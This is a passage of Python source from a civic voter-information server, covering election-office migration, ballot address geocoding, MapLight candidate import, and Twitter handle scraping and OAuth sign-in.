results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
if results['office_list_found']:
google_civic_election_office_list = results['office_list_objects']
# We want to transfer the
transfer_array = {}
transfer_array['wv01off1461'] = "wv02off269"
template_values = {
'messages_on_stage': messages_on_stage,
'we_vote_election': we_vote_election,
'we_vote_election_id': we_vote_election_id,
'we_vote_election_list': we_vote_election_list,
'we_vote_election_office_list': we_vote_election_office_list_new,
'google_civic_election': google_civic_election,
'google_civic_election_id': google_civic_election_id,
'google_civic_election_list': google_civic_election_list,
'google_civic_election_office_list': google_civic_election_office_list,
}
return render(request, 'election/election_migration.html', template_values)
```
#### File: management/commands/save_ballot_coordinates.py
```python
from django.core.management.base import BaseCommand
from geopy.geocoders import get_geocoder_for_service
from geopy.exc import GeocoderQuotaExceeded
from ballot.models import BallotReturned
class Command(BaseCommand):
help = 'Populates the latitude and longitude fields of BallotReturned'
def populate_latitude_for_ballots(self):
for b in BallotReturned.objects.filter(latitude=None).order_by('id'):
full_ballot_address = '{}, {}, {} {}'.format(
b.normalized_line1, b.normalized_city, b.normalized_state, b.normalized_zip)
location = self.google_client.geocode(full_ballot_address)
if location is None:
raise Exception('Could not find a location for ballot {}'.format(b.id))
b.latitude, b.longitude = location.latitude, location.longitude
print('ballot {}, found latitude {}, longitude {}'.format(b.id, b.latitude, b.longitude))
b.save()
def handle(self, *args, **options):
self.google_client = get_geocoder_for_service('google')()
while BallotReturned.objects.filter(latitude=None).exists():
try:
self.populate_latitude_for_ballots()
except GeocoderQuotaExceeded:
self.google_client = get_geocoder_for_service('google')()
print('Success! All BallotReturned objects now have latitude and longitude populated.')
```
#### File: WeVoteServer/import_export_maplight/controllers.py
```python
from .models import MapLightContestOfficeManager, MapLightCandidateManager, MapLightContestOffice, \
MapLightCandidate, validate_maplight_date
from exception.models import handle_record_not_saved_exception
import json
import wevote_functions.admin
logger = wevote_functions.admin.get_logger(__name__)
MAPLIGHT_SAMPLE_BALLOT_JSON_FILE = "import_export_maplight/import_data/maplight_sf_ballot_sample.json"
MAPLIGHT_SAMPLE_CONTEST_JSON_FILE = "import_export_maplight/import_data/contest_{contest_id}.json"
def import_maplight_from_json(request):
load_from_url = False
ballot_for_one_voter_array = []
if load_from_url:
# Request json file from Maplight servers
logger.debug("TO BE IMPLEMENTED: Load Maplight JSON from url")
# request = requests.get(VOTER_INFO_URL, params={
# "key": GOOGLE_CIVIC_API_KEY, # This comes from an environment variable
# "address": "254 Hartford Street San Francisco CA",
# "electionId": "2000",
# })
# structured_json = json.loads(request.text)
else:
# Load saved json from local file
logger.debug("Loading Maplight sample JSON from local file")
with open(MAPLIGHT_SAMPLE_BALLOT_JSON_FILE) as ballot_for_one_voter_json:
ballot_for_one_voter_array = json.load(ballot_for_one_voter_json)
# A MapLight ballot query is essentially an array of contests with the key as the contest_id
if ballot_for_one_voter_array and len(ballot_for_one_voter_array):
# Parse the JSON here. This JSON is a list of contests on the ballot for one voter.
for contest_id in ballot_for_one_voter_array:
# Get a description of the contest. Office? Measure?
contest_overview_array = ballot_for_one_voter_array[contest_id]
if contest_overview_array['type'] == "office":
# Get a description of the office the candidates are competing for
# contest_office_description_json = contest_overview_array['office']
# With the contest_id, we can look up who is running
politicians_running_for_one_contest_array = []
if load_from_url:
logger.debug("TO BE IMPLEMENTED: Load MapLight JSON for a contest from URL")
else:
json_file_with_the_data_from_this_contest = MAPLIGHT_SAMPLE_CONTEST_JSON_FILE.format(
contest_id=contest_id)
try:
with open(json_file_with_the_data_from_this_contest) as json_data:
politicians_running_for_one_contest_array = json.load(json_data)
except Exception as e:
logger.error("File {file_path} not found.".format(
file_path=json_file_with_the_data_from_this_contest
))
# Don't try to process the file if it doesn't exist, but go to the next entry
continue
import_maplight_contest_office_candidates_from_array(politicians_running_for_one_contest_array)
# Also add measure
return
def import_maplight_contest_office_candidates_from_array(politicians_running_for_one_contest_array):
maplight_contest_office_saved = False # Has the contest these politicians are running for been saved?
maplight_contest_office_manager = MapLightContestOfficeManager()
maplight_candidate_manager = MapLightCandidateManager()
loop_count = 0
loop_count_limit = 1
for politician_id in politicians_running_for_one_contest_array:
one_politician_array = politicians_running_for_one_contest_array[politician_id]
# Save the office_contest so we can link the politicians to it first
if not maplight_contest_office_saved:
maplight_contest_office = MapLightContestOffice()
if 'contest' in one_politician_array:
maplight_contest_array = one_politician_array['contest']
if 'office' in maplight_contest_array:
maplight_contest_office_array = maplight_contest_array['office']
if 'id' in maplight_contest_array:
maplight_contest_id = maplight_contest_array['id']
maplight_contest_office = \
maplight_contest_office_manager.fetch_maplight_contest_office_from_id_maplight(
maplight_contest_id)
# If an internal identifier is found, then we know we have an object
if maplight_contest_office.id:
maplight_contest_office_saved = True
# try:
# maplight_contest_office.contest_id = maplight_contest_array['id']
# maplight_contest_office.election_date = maplight_contest_array['election_date']
# maplight_contest_office.title = maplight_contest_array['title']
# maplight_contest_office.type = maplight_contest_array['type']
# maplight_contest_office.url = maplight_contest_array['url']
# # Save into this db the 'office'?
# # Save into this db the 'jurisdiction'?
# maplight_contest_office.save()
# maplight_contest_office_saved = True
#
# except Exception as e:
# handle_record_not_saved_exception(e)
else:
try:
maplight_contest_office = MapLightContestOffice(
contest_id=maplight_contest_array['id'],
election_date=maplight_contest_array['election_date'],
title=maplight_contest_array['title'],
type=maplight_contest_array['type'],
url=maplight_contest_array['url'],
)
# Save into this db the 'office'?
# Save into this db the 'jurisdiction'?
maplight_contest_office.save()
maplight_contest_office_saved = True
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
maplight_candidate = maplight_candidate_manager.fetch_maplight_candidate_from_candidate_id_maplight(
one_politician_array['candidate_id'])
if maplight_candidate.id:
logger.warn(u"Candidate {display_name} previously saved".format(
display_name=maplight_candidate.display_name
))
else:
# Not found in the MapLightCandidate database, so we need to save
try:
maplight_candidate = MapLightCandidate()
maplight_candidate.politician_id = one_politician_array['politician_id']
maplight_candidate.candidate_id = one_politician_array['candidate_id']
maplight_candidate.display_name = one_politician_array['display_name']
maplight_candidate.original_name = one_politician_array['original_name']
maplight_candidate.gender = one_politician_array['gender']
maplight_candidate.first_name = one_politician_array['first_name']
maplight_candidate.middle_name = one_politician_array['middle_name']
maplight_candidate.last_name = one_politician_array['last_name']
maplight_candidate.name_prefix = one_politician_array['name_prefix']
maplight_candidate.name_suffix = one_politician_array['name_suffix']
maplight_candidate.bio = one_politician_array['bio']
maplight_candidate.party = one_politician_array['party']
maplight_candidate.candidate_flags = one_politician_array['candidate_flags']
if validate_maplight_date(one_politician_array['last_funding_update']):
maplight_candidate.last_funding_update = one_politician_array['last_funding_update']
maplight_candidate.roster_name = one_politician_array['roster_name']
maplight_candidate.photo = one_politician_array['photo']
maplight_candidate.url = one_politician_array['url']
maplight_candidate.save()
logger.info(u"Candidate {display_name} added".format(
display_name=maplight_candidate.display_name
))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
# TODO: Now link the candidate to the contest
```
#### File: WeVoteServer/import_export_twitter/controllers.py
```python
from .functions import retrieve_twitter_user_info
from candidate.models import CandidateCampaignManager, CandidateCampaignListManager
from config.base import get_environment_variable
from organization.controllers import update_social_media_statistics_in_other_tables
from organization.models import Organization, OrganizationManager
import re
from socket import timeout
import tweepy
import urllib.request
from voter.models import VoterDeviceLinkManager, VoterManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, \
is_voter_device_id_valid, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
RE_FACEBOOK = r'//www\.facebook\.com/(?:#!/)?(\w+)'
# RE_FACEBOOK = r'/(?:https?:\/\/)?(?:www\.)?facebook\.com\/(?:(?:\w)*#!\/)?(?:pages\/)?(?:[\w\-]*\/)*?(\/)?([^/?]*)/'
FACEBOOK_BLACKLIST = ['group', 'group.php', 'None']
# NOTE: Scraping a website for the Facebook handle is more complicated than Twitter. There must be an existing
# solution available? My attempt turned off for now.
# Only pays attention to https://twitter.com or http://twitter.com and ignores www.twitter.com
RE_TWITTER = r'//twitter\.com/(?:#!/)?(\w+)'
TWITTER_BLACKLIST = ['home', 'https', 'intent', 'none', 'search', 'share', 'twitterapi']
TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY")
TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET")
TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN")
TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET")
class FakeFirefoxURLopener(urllib.request.FancyURLopener):
version = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0)' \
+ ' Gecko/20100101 Firefox/25.0'
class GetOutOfLoop(Exception):
pass
class GetOutOfLoopLocal(Exception):
pass
def refresh_twitter_candidate_details(candidate_campaign):
candidate_campaign_manager = CandidateCampaignManager()
if not candidate_campaign:
status = "TWITTER_CANDIDATE_DETAILS_NOT_RETRIEVED-CANDIDATE_MISSING"
results = {
'success': False,
'status': status,
}
return results
if candidate_campaign.candidate_twitter_handle:
status = "TWITTER_CANDIDATE_DETAILS-REACHING_OUT_TO_TWITTER"
results = retrieve_twitter_user_info(candidate_campaign.candidate_twitter_handle)
if results['success']:
status = "TWITTER_CANDIDATE_DETAILS_RETRIEVED_FROM_TWITTER"
save_results = candidate_campaign_manager.update_candidate_twitter_details(
candidate_campaign, results['twitter_json'])
else:
status = "TWITTER_CANDIDATE_DETAILS-CLEARING_DETAILS"
save_results = candidate_campaign_manager.clear_candidate_twitter_details(candidate_campaign)
results = {
'success': True,
'status': status,
}
return results
def refresh_twitter_organization_details(organization):
organization_manager = OrganizationManager()
if not organization:
status = "ORGANIZATION_TWITTER_DETAILS_NOT_RETRIEVED-ORG_MISSING"
results = {
'success': False,
'status': status,
}
return results
if organization.organization_twitter_handle:
status = "ORGANIZATION_TWITTER_DETAILS-REACHING_OUT_TO_TWITTER"
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
if results['success']:
status = "ORGANIZATION_TWITTER_DETAILS_RETRIEVED_FROM_TWITTER"
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ORGANIZATION_TWITTER_DETAILS_RETRIEVED_FROM_TWITTER_AND_SAVED"
else:
status = "ORGANIZATION_TWITTER_DETAILS-CLEARING_DETAILS"
save_results = organization_manager.clear_organization_twitter_details(organization)
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ORGANIZATION_TWITTER_DETAILS_CLEARED_FROM_DB"
results = {
'success': True,
'status': status,
}
return results
def scrape_social_media_from_one_site(site_url):
twitter_handle = ''
twitter_handle_found = False
facebook_page = ''
facebook_page_found = False
success = False
if len(site_url) < 10:
status = 'PROPER_URL_NOT_PROVIDED: ' + site_url
results = {
'status': status,
'success': success,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'facebook_page': facebook_page,
'facebook_page_found': facebook_page_found,
}
return results
urllib._urlopener = FakeFirefoxURLopener()
headers = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
}
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Encoding': 'none',
# 'Accept-Language': 'en-US,en;q=0.8',
# 'Connection': 'keep-alive'
# 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
try:
request = urllib.request.Request(site_url, None, headers)
page = urllib.request.urlopen(request, timeout=5)
for line in page.readlines():
try:
if not twitter_handle_found:
for m in re.finditer(RE_TWITTER, line.decode()):
if m:
name = m.group(1)
if name not in TWITTER_BLACKLIST:
twitter_handle = name
twitter_handle_found = True
raise GetOutOfLoopLocal
except GetOutOfLoopLocal:
pass
# SEE NOTE ABOUT FACEBOOK SCRAPING ABOVE
# try:
# if not facebook_page_found:
# for m2 in re.finditer(RE_FACEBOOK, line.decode()):
# if m2:
# possible_page1 = m2.group(1)
# if possible_page1 not in FACEBOOK_BLACKLIST:
# facebook_page = possible_page1
# facebook_page_found = True
# raise GetOutOfLoopLocal
# try:
# possible_page2 = m2.group(2)
# if possible_page2 not in FACEBOOK_BLACKLIST:
# facebook_page = possible_page2
# facebook_page_found = True
# raise GetOutOfLoopLocal
# # ATTEMPT 1
# # start_of_close_tag_index = possible_page2.find('"')
# # possible_page2 = possible_page2[:start_of_close_tag_index]
# # ATTEMPT 2
# # fb_re = re.compile(r'facebook.com([^"]+)')
# # results = fb_re.findall(possible_page2)
# except Exception as error_instance:
# pass
# # possible_page3 = m2.group(3)
# # possible_page4 = m2.group(4)
# except GetOutOfLoopLocal:
# pass
if twitter_handle_found: # and facebook_page_found:
raise GetOutOfLoop
success = True
status = 'FINISHED_SCRAPING_PAGE'
except timeout:
status = "SCRAPE_TIMEOUT_ERROR"
success = False
except GetOutOfLoop:
success = True
status = 'TWITTER_HANDLE_FOUND-BREAK_OUT'
except IOError as error_instance:
# Catch the error message coming back from urllib.request.urlopen and pass it in the status
error_message = error_instance
status = "SCRAPE_SOCIAL_IO_ERROR: {error_message}".format(error_message=error_message)
success = False
except Exception as error_instance:
error_message = error_instance
status = "SCRAPE_GENERAL_EXCEPTION_ERROR: {error_message}".format(error_message=error_message)
success = False
results = {
'status': status,
'success': success,
'page_redirected': twitter_handle,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'facebook_page': facebook_page,
'facebook_page_found': facebook_page_found,
}
return results
def scrape_and_save_social_media_from_all_organizations(state_code='', force_retrieve=False):
facebook_pages_found = 0
twitter_handles_found = 0
organization_manager = OrganizationManager()
organization_list_query = Organization.objects.order_by('organization_name')
if positive_value_exists(state_code):
organization_list_query = organization_list_query.filter(state_served_code=state_code)
organization_list = organization_list_query
for organization in organization_list:
twitter_handle = False
facebook_page = False
if not organization.organization_website:
continue
if (not positive_value_exists(organization.organization_twitter_handle)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(organization.organization_website)
# Only include a change if we have a new value (do not try to save blank value)
if scrape_results['twitter_handle_found'] and positive_value_exists(scrape_results['twitter_handle']):
twitter_handle = scrape_results['twitter_handle']
twitter_handles_found += 1
if scrape_results['facebook_page_found'] and positive_value_exists(scrape_results['facebook_page']):
facebook_page = scrape_results['facebook_page']
facebook_pages_found += 1
save_results = organization_manager.update_organization_social_media(organization, twitter_handle,
facebook_page)
# ######################################
# We refresh the Twitter information in another function
status = "ORGANIZATION_SOCIAL_MEDIA_SCRAPED"
results = {
'success': True,
'status': status,
'twitter_handles_found': twitter_handles_found,
'facebook_pages_found': facebook_pages_found,
}
return results
def retrieve_twitter_data_for_all_organizations(state_code='', google_civic_election_id=0, first_retrieve_only=False):
number_of_twitter_accounts_queried = 0
number_of_organizations_updated = 0
organization_manager = OrganizationManager()
organization_list_query = Organization.objects.order_by('organization_name')
if positive_value_exists(state_code):
organization_list_query = organization_list_query.filter(state_served_code=state_code)
# TODO DALE limit this to organizations that have a voter guide in a particular election
organization_list = organization_list_query
for organization in organization_list:
# ######################################
# If we have a Twitter handle for this org, refresh the data
if organization.organization_twitter_handle:
retrieved_twitter_data = False
if first_retrieve_only:
if not positive_value_exists(organization.twitter_followers_count):
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
retrieved_twitter_data = results['success']
number_of_twitter_accounts_queried += 1
else:
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
retrieved_twitter_data = results['success']
number_of_twitter_accounts_queried += 1
if retrieved_twitter_data:
number_of_organizations_updated += 1
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ALL_ORGANIZATION_TWITTER_DATA_RETRIEVED"
results = {
'success': True,
'status': status,
'number_of_twitter_accounts_queried': number_of_twitter_accounts_queried,
'number_of_organizations_updated': number_of_organizations_updated,
}
return results
def scrape_and_save_social_media_for_candidates_in_one_election(google_civic_election_id=0):
facebook_pages_found = 0
twitter_handles_found = 0
force_retrieve = False
status = ""
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_manager = CandidateCampaignManager()
candidate_list_manager = CandidateCampaignListManager()
return_list_of_objects = True
results = candidate_list_manager.retrieve_all_candidates_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
status += results['status']
if results['success']:
candidate_list = results['candidate_list_objects']
else:
candidate_list = []
for candidate in candidate_list:
twitter_handle = False
facebook_page = False
if not candidate.candidate_url:
continue
if (not positive_value_exists(candidate.candidate_twitter_handle)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(candidate.candidate_url)
# Only include a change if we have a new value (do not try to save blank value)
if scrape_results['twitter_handle_found'] and positive_value_exists(scrape_results['twitter_handle']):
twitter_handle = scrape_results['twitter_handle']
twitter_handles_found += 1
if scrape_results['facebook_page_found'] and positive_value_exists(scrape_results['facebook_page']):
facebook_page = scrape_results['facebook_page']
facebook_pages_found += 1
save_results = candidate_manager.update_candidate_social_media(candidate, twitter_handle, facebook_page)
# ######################################
# We refresh the Twitter information in another function
status = "ORGANIZATION_SOCIAL_MEDIA_RETRIEVED"
results = {
'success': True,
'status': status,
'twitter_handles_found': twitter_handles_found,
'facebook_pages_found': facebook_pages_found,
}
return results
def refresh_twitter_candidate_details_for_election(google_civic_election_id):
twitter_handles_added = 0
profiles_refreshed_with_twitter_data = 0
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_list_manager = CandidateCampaignListManager()
return_list_of_objects = True
candidates_results = candidate_list_manager.retrieve_all_candidates_for_upcoming_election(
google_civic_election_id, return_list_of_objects)
if candidates_results['candidate_list_found']:
candidate_list = candidates_results['candidate_list_objects']
for candidate in candidate_list:
# Extract twitter_handle from google_civic_election information
if positive_value_exists(candidate.twitter_url) \
and not positive_value_exists(candidate.candidate_twitter_handle):
# If we got a twitter_url from Google Civic, and we haven't already stored a twitter handle, move it
candidate.candidate_twitter_handle = extract_twitter_handle_from_text_string(candidate.twitter_url)
candidate.save()
twitter_handles_added += 1
if positive_value_exists(candidate.candidate_twitter_handle):
refresh_twitter_candidate_details(candidate)
profiles_refreshed_with_twitter_data += 1
status = "CANDIDATE_SOCIAL_MEDIA_RETRIEVED"
results = {
'success': True,
'status': status,
'twitter_handles_added': twitter_handles_added,
'profiles_refreshed_with_twitter_data': profiles_refreshed_with_twitter_data,
}
return results
def transfer_candidate_twitter_handles_from_google_civic(google_civic_election_id=0):
twitter_handles_transferred = 0
status = ""
google_civic_election_id = convert_to_int(google_civic_election_id)
candidate_list_object = CandidateCampaignListManager()
return_list_of_objects = True
results = candidate_list_object.retrieve_all_candidates_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
status += results['status']
if results['success']:
candidate_list = results['candidate_list_objects']
else:
candidate_list = []
for candidate in candidate_list:
if not candidate.twitter_url:
continue
# Only proceed if we don't already have a twitter_handle
if not positive_value_exists(candidate.candidate_twitter_handle):
candidate.candidate_twitter_handle = candidate.twitter_url.replace("https://twitter.com/", "")
candidate.save()
twitter_handles_transferred += 1
# ######################################
# We refresh the Twitter information in another function
status += " CANDIDATE_TWITTER_HANDLES_TRANSFERRED"
results = {
'success': True,
'status': status,
'twitter_handles_transferred': twitter_handles_transferred,
}
return results
def twitter_sign_in_start_for_api(voter_device_id, return_url): # twitterSignInStart
"""
:param voter_device_id:
:param return_url: Where to direct the browser at the very end of the process
:return:
"""
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
voter = results['voter']
if voter.twitter_access_token and voter.twitter_access_secret:
# If here the voter might already be signed in, so we don't want to ask them to approve again
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(voter.twitter_access_token, voter.twitter_access_secret)
api = tweepy.API(auth)
try:
tweepy_user_object = api.me()
success = True
# What is the error situation where the twitter_access_token and twitter_access_secret are no longer valid?
# We need to deal with this (wipe them from the database and rewind to the right place in the process
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = ''
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if success:
# Reach out to the twitterSignInRequestVoterInfo -- no need to redirect
empty_return_url = ""
voter_info_results = twitter_sign_in_request_voter_info_for_api(voter_device_id, empty_return_url)
success = voter_info_results['success']
status = "SKIPPED_AUTH_DIRECT_REQUEST_VOTER_INFO: " + voter_info_results['status']
results = {
'status': status,
'success': success,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': voter_info_results['voter_info_retrieved'],
'switch_accounts': voter_info_results['switch_accounts'], # If true, new voter_device_id returned
}
return results
else:
# Somehow reset tokens and start over.
pass
callback_url = WE_VOTE_SERVER_ROOT_URL + "/apis/v1/twitterSignInRequestAccessToken/"
callback_url += "?voter_device_id=" + voter_device_id
callback_url += "&return_url=" + return_url
# This is where
twitter_authorization_url = ''
try:
# We take the Consumer Key and the Consumer Secret, and request a token & token_secret
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET, callback_url)
twitter_authorization_url = auth.get_authorization_url()
request_token_dict = auth.request_token
twitter_request_token = ''
twitter_request_token_secret = ''
if 'oauth_token' in request_token_dict:
twitter_request_token = request_token_dict['oauth_token']
if 'oauth_token_secret' in request_token_dict:
twitter_request_token_secret = request_token_dict['oauth_token_secret']
# We save these values in the Voter table, and then return a twitter_authorization_url where the voter signs in
# Once they sign in to the Twitter login, they are redirected back to the We Vote callback_url
# On that callback_url page, we are told if they are signed in
# on Twitter or not, and capture an access key we can use to retrieve information about the Twitter user
# NOTE: Regarding the callback url, I think this can just be a direct call to the API server,
# since we have the voter_device_id
if positive_value_exists(twitter_request_token) and positive_value_exists(twitter_request_token_secret):
voter.twitter_request_token = twitter_request_token
voter.twitter_request_secret = twitter_request_token_secret
voter.save()
success = True
status = "TWITTER_REDIRECT_URL_RETRIEVED"
else:
success = False
status = "TWITTER_REDIRECT_URL_NOT_RETRIEVED"
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = 'TWITTER_SIGN_IN_START: '
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if success:
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'twitter_redirect_url': twitter_authorization_url,
'voter_info_retrieved': False,
'switch_accounts': False,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'twitter_redirect_url': '',
'voter_info_retrieved': False,
'switch_accounts': False,
}
return results
def twitter_sign_in_request_access_token_for_api(voter_device_id,
incoming_request_token, incoming_oauth_verifier,
return_url):
"""
twitterSignInRequestAccessToken
After signing in and agreeing to the application's terms, the user is redirected back to the application with
the same request token and another value, this time the OAuth verifier.
Within this function we use
1) the request token and
2) request secret along with the
3) OAuth verifier to get an access token, also from Twitter.
:param voter_device_id:
:param incoming_request_token:
:param incoming_oauth_verifier:
:param return_url: If a value is provided, return to this URL when the whole process is complete
:return:
"""
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
voter = results['voter']
if not voter.twitter_request_token == incoming_request_token:
results = {
'status': "TWITTER_REQUEST_TOKEN_DOES_NOT_MATCH_STORED_VOTER_VALUE",
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
twitter_access_token = ''
twitter_access_token_secret = ''
try:
# We take the Request Token, Request Secret, and OAuth Verifier and request an access_token
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.request_token = {'oauth_token': voter.twitter_request_token,
'oauth_token_secret': voter.twitter_request_secret}
auth.get_access_token(incoming_oauth_verifier)
if positive_value_exists(auth.access_token) and positive_value_exists(auth.access_token_secret):
twitter_access_token = auth.access_token
twitter_access_token_secret = auth.access_token_secret
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = 'TWITTER_SIGN_IN_REQUEST_ACCESS_TOKEN: '
error_tuple = error_instance.args
for error_dict in error_tuple:
count = 0
# for one_error in error_dict:
# status += '[' + one_error[count] + '] '
# count += 1
try:
# We save these values in the Voter table
if positive_value_exists(twitter_access_token) and positive_value_exists(twitter_access_token_secret):
voter.twitter_access_token = twitter_access_token
voter.twitter_access_secret = twitter_access_token_secret
voter.save()
success = True
status = "TWITTER_ACCESS_TOKEN_RETRIEVED_AND_SAVED"
else:
success = False
status = "TWITTER_ACCESS_TOKEN_NOT_RETRIEVED"
except Exception as e:
success = False
status = "TWITTER_ACCESS_TOKEN_NOT_SAVED"
if success:
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': True,
'return_url': return_url,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'access_token_and_secret_returned': False,
'return_url': return_url,
}
return results
def twitter_sign_in_request_voter_info_for_api(voter_device_id, return_url, switch_accounts_if_needed=True):
"""
twitterSignInRequestVoterInfo
When here, the incoming voter_device_id should already be authenticated
:param voter_device_id:
:param return_url: Where to return the browser when sign in process is complete
:param switch_accounts_if_needed:
:return:
"""
twitter_handle = ''
twitter_handle_found = False
tweepy_user_object = None
twitter_user_object_found = False
voter_info_retrieved = False
switch_accounts = False
# Get voter_id from the voter_device_id
results = is_voter_device_id_valid(voter_device_id)
if not results['success']:
results = {
'success': False,
'status': "VALID_VOTER_DEVICE_ID_MISSING",
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if not positive_value_exists(results['voter_found']):
results = {
'status': "VALID_VOTER_MISSING",
'success': False,
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
voter = results['voter']
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(voter.twitter_access_token, voter.twitter_access_secret)
api = tweepy.API(auth)
try:
tweepy_user_object = api.me()
twitter_json = tweepy_user_object._json
success = True
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_SUCCESSFUL'
twitter_handle = tweepy_user_object.screen_name
twitter_handle_found = True
twitter_user_object_found = True
except tweepy.RateLimitError:
success = False
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = 'TWITTER_SIGN_IN_REQUEST_VOTER_INFO_TWEEPY_ERROR: '
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
if twitter_user_object_found:
# We need to deal with these cases
# 1) Does account already exist?
results = voter_manager.retrieve_voter_by_twitter_id(tweepy_user_object.id)
if results['voter_found'] and switch_accounts_if_needed:
voter_found_with_twitter_id = results['voter']
switch_accounts = True
# Relink this voter_device_id to the original account
voter_device_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_manager.retrieve_voter_device_link(voter_device_id)
voter_device_link = voter_device_link_results['voter_device_link']
update_voter_device_link_results = voter_device_manager.update_voter_device_link(
voter_device_link, voter_found_with_twitter_id)
if update_voter_device_link_results['voter_device_link_updated']:
# Transfer access token and secret
voter_found_with_twitter_id.twitter_access_token = voter.twitter_access_token
voter_found_with_twitter_id.twitter_access_secret = voter.twitter_access_secret
voter_found_with_twitter_id.save()
status += "TWITTER_SIGN_IN-ALREADY_LINKED_TO_OTHER_ACCOUNT-TRANSFERRED "
success = True
save_user_results = voter_manager.save_twitter_user_values(voter_found_with_twitter_id,
tweepy_user_object)
if save_user_results['success']:
voter_info_retrieved = True
status += save_user_results['status']
else:
status = "TWITTER_SIGN_IN-ALREADY_LINKED_TO_OTHER_ACCOUNT-COULD_NOT_TRANSFER "
success = False
# 2) If account doesn't exist for this person, save
else:
save_user_results = voter_manager.save_twitter_user_values(voter, tweepy_user_object)
if save_user_results['success']:
voter_info_retrieved = True
results = {
'status': status,
'success': success,
'voter_device_id': voter_device_id,
'twitter_handle': twitter_handle,
